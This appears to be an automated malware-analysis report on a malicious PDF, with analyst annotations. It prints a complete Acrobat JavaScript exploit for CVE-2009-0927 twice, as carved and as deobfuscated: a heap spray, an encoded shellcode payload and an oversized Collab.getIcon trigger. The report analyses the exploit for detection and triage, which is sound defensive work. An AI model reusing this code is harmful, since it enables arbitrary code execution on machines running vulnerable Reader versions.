MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell — not supported by this sample's evidence: the carved script is Acrobat (Reader) JavaScript and no PowerShell artefact appears anywhere in the report. The visible behaviour fits T1203 Exploitation for Client Execution (CVE-2009-0927) and T1059.007 JavaScript; treat the PowerShell tag as an automated-mapping error unless a decoded payload shows otherwise.
The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics, carved as 'javascript_obj0017_000.js'. The PDF_UNESCAPE heuristic fires on the %u-escaped binary strings the script assembles; the only genuine obfuscation is the hex-escaped property name that hides the Collab.getIcon call, and the deobfuscated stage resolves it. The script is a heap spray followed by Collab.getIcon() with an oversized argument — the CVE-2009-0927 stack overflow — carrying an embedded, letter-encoded shellcode (sc2) and a short decoder stub (sc1). Whether that shellcode downloads a second stage or drops one locally is not established by this report: no download URL or execution command exists in the script, and every extracted URL is an XMP metadata namespace, so a "remote second-stage" claim should not be made until the shellcode is decoded.
Machine Learning
- Nyx PDF Classifier malicious score 0.9995
Heuristics 6
-
Collab.getIcon — CVE-2009-0927 | critical | CVE exact | CVE_2009_0927 — PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader/Acrobat triggered by Collab.getIcon() with a crafted (oversized) argument and allows arbitrary code execution. (Identified after JavaScript deobfuscation; the matching call is Collab.getIcon(of+"_N.bundle") in the carved script, where `of` is 16,384 bytes of 0x0a.)
-
JavaScript action | low | 2 related findings | PDF_JAVASCRIPT — PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster | critical | PDF_JS_EXPLOIT_CLUSTER — PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
var sc1 = unescape("%u5850%u5850%uEB90%u4022%u5A48%u5F52%u8B66%u800A"+ -
Embedded JS stream | low | PDF_JS — PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE — One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL | info | EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Note: all six URLs below are standard XMP/RDF namespace identifiers from the document's metadata block, not hosts the sample contacts; they are not IOCs and should not be blocked or pivoted on. URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
- http://ns.adobe.com/pdf/1.3/In PDF document text
- http://ns.adobe.com/xap/1.0/In PDF document text
- http://purl.org/dc/elements/1.1/In PDF document text
- http://ns.adobe.com/xap/1.0/mm/In PDF document text
- http://ns.adobe.com/pdfx/1.3/In PDF document text
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0017_000.js |
pdf-javascript-stream | PDF /JS object 17 at offset 0x4DF | 4162 bytes |
SHA-256: 7944bd293b6c9e8b528e8339f86b0a68fbdfb2525eb87f6454342b33fd1c1ed6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 eval/decoder/string-building token(s).
|
|||
Preview script — first 1,000 lines of the extracted script
// Analyst annotation — carved malicious sample; code below is left verbatim.
// sc1: 23 %u-escapes = 46 bytes of raw binary (UTF-16LE in memory), not text.
// Read little-endian as x86 it looks like a tiny decoder stub: push/pop/nop
// padding, a jmp/call pair to obtain its own address, then a loop that takes
// two chars from sc2, subtracts 0x64 ('d') from each, packs the two nibbles
// into one byte and stops at the "00" terminator that ends sc2.
// NOTE(review): confirm by disassembly before quoting the decode scheme.
var sc1 = unescape("%u5850%u5850%uEB90%u4022%u5A48%u5F52%u8B66%u800A"+
"%u30F9%u1A74%uE980%uC064%u04E1%uED80%u8064%u0FE5"+
"%uCD02%u0F88%u4242%uEB47%uE8E3%uFFD9%uFFFF");
// Returns `what` concatenated `count` times ("" when count <= 0).
// Used only to size the spray filler and the oversized getIcon argument.
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
// Converts a hex string (two chars per byte) into a string of 8-bit chars via
// util.byteToChar — an Acrobat/Reader JavaScript API, not browser JS, which is
// one reason this script only runs inside Adobe's viewer.
function myunescape(buf) {
var ret='';
for (var x=0;x < buf.length; x+=2) {
ret += util.byteToChar(Number('0x'+buf.substr(x,2)));
}
return ret;
}
// Heap spray. `blah` = 640 chars of 0x4b43/0x434b filler (bytes 0x43/0x4B,
// inc/dec ebx — presumably a NOP-equivalent sled) followed by the decoder sc1
// and the encoded payload sc2. Each sprayed block is padded to about 0x40000
// UTF-16 chars (~512 KiB) and 200 copies are kept alive in the global `mm`
// array (~100 MiB), so a hijacked return address landing anywhere in the
// sprayed region slides into sc1. Every variable here is an implicit global
// (no `var`), typical of copied proof-of-concept code.
function spray(){
blah = repeat(128, unescape("%u434b%u434b%u4b43%u4b43%u434b")) + sc1+sc2;
headersize = 20;
wap = headersize+blah.length;
bigblock = unescape("%u4b43%u4b43");
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<200;i++) mm[i] = block + blah;
}
// sc2: the encoded payload. Every byte lies in 0x64..0x73 ('d'..'s'), i.e. one
// hex nibble per letter, and the blob ends in "%u3030" ("00") — exactly the
// alphabet and terminator the sc1 stub handles. Its actual behaviour
// (downloader vs. local dropper, any C2 address) is NOT established anywhere in
// this report; decode it offline before asserting a second-stage URL.
var sc2 = unescape("%u6C72%u6464%u6464%u6464%u6464%u6E69%u6969%u6F6C"+
"%u7072%u656C%u7072%u686A%u6864%u6464%u6464%u6F6C"+
"%u6873%u6C72%u706C%u6564%u6464%u6464%u6F6C%u6C73"+
"%u6C72%u7372%u6464%u6464%u6464%u6D6C%u6A64%u7373"+
"%u6A67%u6C6A%u716E%u6F6D%u716B%u7371%u6C72%u6865"+
"%u6564%u6464%u6464%u6D6C%u6A68%u7064%u7373%u6A67"+
"%u6C6A%u6D66%u6665%u6A70%u6A69%u6C72%u6964%u6564"+
"%u6464%u6464%u6D6C%u6A68%u6465%u7373%u6A67%u6C6A"+
"%u6D69%u7067%u6B64%u6F6B%u6C72%u6A73%u6464%u6464"+
"%u6464%u6D6C%u6A68%u6865%u7373%u6A67%u6C6A%u726B"+
"%u6C71%u6672%u676B%u6C72%u6B72%u6464%u6464%u6464"+
"%u6D6C%u6A68%u6867%u6767%u6D70%u6F72%u6764%u6F6C"+
"%u7268%u7067%u676C%u6570%u6864%u6569%u6E6A%u6464"+
"%u6569%u7373%u6A69%u7064%u6D69%u676C%u6C73%u7373"+
"%u686B%u6473%u7167%u6468%u7365%u6464%u6464%u6A6B"+
"%u6D72%u6D6C%u7268%u7067%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6664%u6E6A%u6464%u7373%u6A6B"+
"%u7067%u7373%u6A69%u6465%u6D6C%u6A68%u6868%u676C"+
"%u6C73%u6464%u686B%u6F70%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6864%u7373%u6A6B%u6868%u7373"+
"%u6A69%u6865%u6D6C%u6A68%u6C68%u676C%u6C73%u6464"+
"%u686B%u696F%u656C%u6C67%u6966%u6469%u6868%u6A68"+
"%u6F6C%u7268%u7067%u696B%u716E%u656C%u6C6F%u6464"+
"%u6665%u6464%u6464%u6469%u686A%u6469%u6868%u696B"+
"%u656E%u656C%u6C6F%u6864%u6665%u6464%u6464%u7372"+
"%u7273%u6E72%u726E%u696B%u696D%u6D6F%u6464%u6A64"+
"%u6464%u6464%u656C%u7072%u6464%u6C64%u6464%u6464"+
"%u6A69%u6B69%u6F6C%u6473%u656C%u6A70%u6465%u6665"+
"%u6464%u6464%u6F6C%u6870%u676C%u6470%u6C64%u6F6C"+
"%u6C73%u6773%u686E%u6D6F%u6464%u6A64%u6464%u6464"+
"%u6D68%u6D68%u6D68%u6D68%u656C%u6867%u6C64%u7272"+
"%u7273%u7273%u7372%u696C%u6D70%u696B%u6573%u7369"+
"%u7269%u7373%u6A6B%u7067%u7373%u6A6B%u6C68%u7373"+
"%u6A6B%u6868%u7373%u6472%u6969%u6A69%u686A%u656E"+
"%u6467%u6464%u6464%u6464%u696C%u6470%u6C6B%u6765"+
"%u7267%u6F6C%u6468%u7064%u7267%u6F6C%u646B%u7065"+
"%u7267%u6F6C%u7269%u6C64%u716E%u7267%u6F6C%u6C6A"+
"%u6C64%u6F72%u7164%u7267%u6F6C%u6468%u6867%u7267"+
"%u6F6C%u6C6E%u6C6F%u6464%u6464%u6464%u6767%u6F71"+
"%u6F6C%u6970%u7269%u7169%u6670%u6864%u6464%u6769"+
"%u6969%u6A69%u6B69%u6A67%u6F6C%u706A%u6866%u6C65"+
"%u6A67%u6F6C%u6968%u7067%u6A67%u6F6C%u6869%u6964"+
"%u6C6B%u6764%u6971%u7267%u6F6C%u6E68%u6C65%u7267"+
"%u6F6C%u6E69%u6466%u6764%u7171%u6772%u6C67%u6D68"+
"%u7267%u6F6C%u6867%u6F6C%u6764%u6973%u6767%u7373"+
"%u7073%u6767%u6470%u706E%u6E67%u6870%u686B%u6B64"+
"%u6570%u7370%u7164%u6764%u6C73%u6F72%u6673%u6A67"+
"%u6F67%u706B%u6866%u6865%u696B%u7371%u7267%u6F6C"+
"%u6E69%u6866%u6764%u7171%u6A6A%u7267%u6F6C%u7064"+
"%u6F68%u7267%u6F6C%u6E69%u7065%u6764%u7171%u7267"+
"%u6F6C%u6864%u6F6C%u6764%u6970%u6F72%u6664%u6767"+
"%u6470%u6F6C%u6971%u7369%u7269%u7169%u6F69%u6670"+
"%u6C64%u6464%u6C72%u6464%u6464%u6464%u6464%u6C69"+
"%u676C%u6470%u6964%u6770%u3030");
// `of`: 4096 x 4 = 16,384 chars of 0x0a — the oversized argument handed to
// Collab.getIcon below, i.e. the overflow trigger for CVE-2009-0927.
of = repeat(4096, myunescape("0a0a0a0a"));
// Trigger. Array `a` is only hex-escaped text: a[0] = "_N.bundle",
// a[1] = "getIcon", so the call resolves to
// Collab.getIcon(<16,384 x 0x0a> + "_N.bundle") — the crafted-argument stack
// overflow of CVE-2009-0927. This string hiding is the whole of the script's
// "obfuscation"; spray() must run first so the hijacked return lands in sc1.
function exploit() {
spray();
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65","\x67\x65\x74\x49\x63\x6f\x6e"];var b=[a[0x0]];Collab[a[0x1]](of+b[0x0]);
}
// Entry point. `this.external` is presumably Acrobat's Doc.external (true when
// the PDF is rendered by a browser plug-in); in that case the trigger is
// deferred 1.2 s through a string-evaluating app.setTimeOut, otherwise it
// fires immediately. The timer handle `shaft` is never read.
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exploit()",1200);
else
exploit();
|
|||
js_property_alias_stage_000.js |
deobfuscated-js | JavaScript property alias normalized stage at offset 0x4DF | 4114 bytes |
SHA-256: d866bd1292f9f8634c69898a9f6bdfc5d278041dadbdc7eb58669a84cb70348c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 eval/decoder/string-building token(s).
|
|||
Preview script — first 1,000 lines of the extracted script (property-alias-normalized stage; identical to the carved script except that the hex-escaped strings in exploit() are resolved)
// Analyst annotation — deobfuscated stage of a malicious sample; code left verbatim.
// sc1: 46 bytes of %u-escaped binary (UTF-16LE), not text. Interpreted as x86
// it appears to be a small decoder stub: padding, a jmp/call to locate itself,
// then a loop that reads char pairs from sc2, subtracts 0x64 ('d') from each,
// combines the nibbles into a byte and halts at the trailing "00".
// NOTE(review): confirm by disassembly.
var sc1 = unescape("%u5850%u5850%uEB90%u4022%u5A48%u5F52%u8B66%u800A"+
"%u30F9%u1A74%uE980%uC064%u04E1%uED80%u8064%u0FE5"+
"%uCD02%u0F88%u4242%uEB47%uE8E3%uFFD9%uFFFF");
// String repetition helper: `what` joined `count` times, "" for count <= 0.
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
// Hex string -> string of 8-bit chars, using Acrobat's util.byteToChar
// (Reader-only API; the script cannot run in an ordinary JS engine).
function myunescape(buf) {
var ret='';
for (var x=0;x < buf.length; x+=2) {
ret += util.byteToChar(Number('0x'+buf.substr(x,2)));
}
return ret;
}
// Heap spray: 640 chars of 0x43/0x4B filler (inc/dec ebx, presumably a
// NOP-equivalent sled) + decoder sc1 + encoded payload sc2, padded to roughly
// 0x40000 UTF-16 chars per block, 200 blocks retained in global `mm`
// (~100 MiB). All locals are implicit globals (no `var`).
function spray(){
blah = repeat(128, unescape("%u434b%u434b%u4b43%u4b43%u434b")) + sc1+sc2;
headersize = 20;
wap = headersize+blah.length;
bigblock = unescape("%u4b43%u4b43");
while (bigblock.length<wap) bigblock+=bigblock;
fillblock = bigblock.substring(0, wap);
block = bigblock.substring(0, bigblock.length-wap);
while(block.length+wap<0x40000) block = block+block+fillblock;
mm = new Array();
for (i=0;i<200;i++) mm[i] = block + blah;
}
// sc2: encoded payload — all bytes are in 'd'..'s' (0x64..0x73), one hex nibble
// per letter, terminated by "00", matching the sc1 decoder. What the decoded
// shellcode does (download vs. drop, any C2) is not shown by this report;
// decode it offline before claiming a remote second stage.
var sc2 = unescape("%u6C72%u6464%u6464%u6464%u6464%u6E69%u6969%u6F6C"+
"%u7072%u656C%u7072%u686A%u6864%u6464%u6464%u6F6C"+
"%u6873%u6C72%u706C%u6564%u6464%u6464%u6F6C%u6C73"+
"%u6C72%u7372%u6464%u6464%u6464%u6D6C%u6A64%u7373"+
"%u6A67%u6C6A%u716E%u6F6D%u716B%u7371%u6C72%u6865"+
"%u6564%u6464%u6464%u6D6C%u6A68%u7064%u7373%u6A67"+
"%u6C6A%u6D66%u6665%u6A70%u6A69%u6C72%u6964%u6564"+
"%u6464%u6464%u6D6C%u6A68%u6465%u7373%u6A67%u6C6A"+
"%u6D69%u7067%u6B64%u6F6B%u6C72%u6A73%u6464%u6464"+
"%u6464%u6D6C%u6A68%u6865%u7373%u6A67%u6C6A%u726B"+
"%u6C71%u6672%u676B%u6C72%u6B72%u6464%u6464%u6464"+
"%u6D6C%u6A68%u6867%u6767%u6D70%u6F72%u6764%u6F6C"+
"%u7268%u7067%u676C%u6570%u6864%u6569%u6E6A%u6464"+
"%u6569%u7373%u6A69%u7064%u6D69%u676C%u6C73%u7373"+
"%u686B%u6473%u7167%u6468%u7365%u6464%u6464%u6A6B"+
"%u6D72%u6D6C%u7268%u7067%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6664%u6E6A%u6464%u7373%u6A6B"+
"%u7067%u7373%u6A69%u6465%u6D6C%u6A68%u6868%u676C"+
"%u6C73%u6464%u686B%u6F70%u6E6A%u6464%u6E6A%u6464"+
"%u6E6A%u6464%u6E6A%u6864%u7373%u6A6B%u6868%u7373"+
"%u6A69%u6865%u6D6C%u6A68%u6C68%u676C%u6C73%u6464"+
"%u686B%u696F%u656C%u6C67%u6966%u6469%u6868%u6A68"+
"%u6F6C%u7268%u7067%u696B%u716E%u656C%u6C6F%u6464"+
"%u6665%u6464%u6464%u6469%u686A%u6469%u6868%u696B"+
"%u656E%u656C%u6C6F%u6864%u6665%u6464%u6464%u7372"+
"%u7273%u6E72%u726E%u696B%u696D%u6D6F%u6464%u6A64"+
"%u6464%u6464%u656C%u7072%u6464%u6C64%u6464%u6464"+
"%u6A69%u6B69%u6F6C%u6473%u656C%u6A70%u6465%u6665"+
"%u6464%u6464%u6F6C%u6870%u676C%u6470%u6C64%u6F6C"+
"%u6C73%u6773%u686E%u6D6F%u6464%u6A64%u6464%u6464"+
"%u6D68%u6D68%u6D68%u6D68%u656C%u6867%u6C64%u7272"+
"%u7273%u7273%u7372%u696C%u6D70%u696B%u6573%u7369"+
"%u7269%u7373%u6A6B%u7067%u7373%u6A6B%u6C68%u7373"+
"%u6A6B%u6868%u7373%u6472%u6969%u6A69%u686A%u656E"+
"%u6467%u6464%u6464%u6464%u696C%u6470%u6C6B%u6765"+
"%u7267%u6F6C%u6468%u7064%u7267%u6F6C%u646B%u7065"+
"%u7267%u6F6C%u7269%u6C64%u716E%u7267%u6F6C%u6C6A"+
"%u6C64%u6F72%u7164%u7267%u6F6C%u6468%u6867%u7267"+
"%u6F6C%u6C6E%u6C6F%u6464%u6464%u6464%u6767%u6F71"+
"%u6F6C%u6970%u7269%u7169%u6670%u6864%u6464%u6769"+
"%u6969%u6A69%u6B69%u6A67%u6F6C%u706A%u6866%u6C65"+
"%u6A67%u6F6C%u6968%u7067%u6A67%u6F6C%u6869%u6964"+
"%u6C6B%u6764%u6971%u7267%u6F6C%u6E68%u6C65%u7267"+
"%u6F6C%u6E69%u6466%u6764%u7171%u6772%u6C67%u6D68"+
"%u7267%u6F6C%u6867%u6F6C%u6764%u6973%u6767%u7373"+
"%u7073%u6767%u6470%u706E%u6E67%u6870%u686B%u6B64"+
"%u6570%u7370%u7164%u6764%u6C73%u6F72%u6673%u6A67"+
"%u6F67%u706B%u6866%u6865%u696B%u7371%u7267%u6F6C"+
"%u6E69%u6866%u6764%u7171%u6A6A%u7267%u6F6C%u7064"+
"%u6F68%u7267%u6F6C%u6E69%u7065%u6764%u7171%u7267"+
"%u6F6C%u6864%u6F6C%u6764%u6970%u6F72%u6664%u6767"+
"%u6470%u6F6C%u6971%u7369%u7269%u7169%u6F69%u6670"+
"%u6C64%u6464%u6C72%u6464%u6464%u6464%u6464%u6C69"+
"%u676C%u6470%u6964%u6770%u3030");
// `of`: 16,384 chars of 0x0a — the oversized Collab.getIcon argument (CVE-2009-0927 trigger).
of = repeat(4096, myunescape("0a0a0a0a"));
// Trigger, with the property-alias normalization applied: the carved script's
// Collab[a[1]](...) is now the literal Collab.getIcon(of+"_N.bundle") — the
// crafted-argument stack overflow of CVE-2009-0927. a[1] ("getIcon") is left
// over from the original indirection and is no longer used.
function exploit() {
spray();
var a=["_N.bundle","getIcon"];var b=[a[0x0]];Collab.getIcon(of+b[0x0]);
}
// Dispatch: when `this.external` is set (presumably Acrobat's Doc.external,
// i.e. viewed in a browser plug-in) the trigger runs after 1.2 s via a
// string-evaluated app.setTimeOut; otherwise it runs immediately.
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exploit()",1200);
else
exploit();
|
|||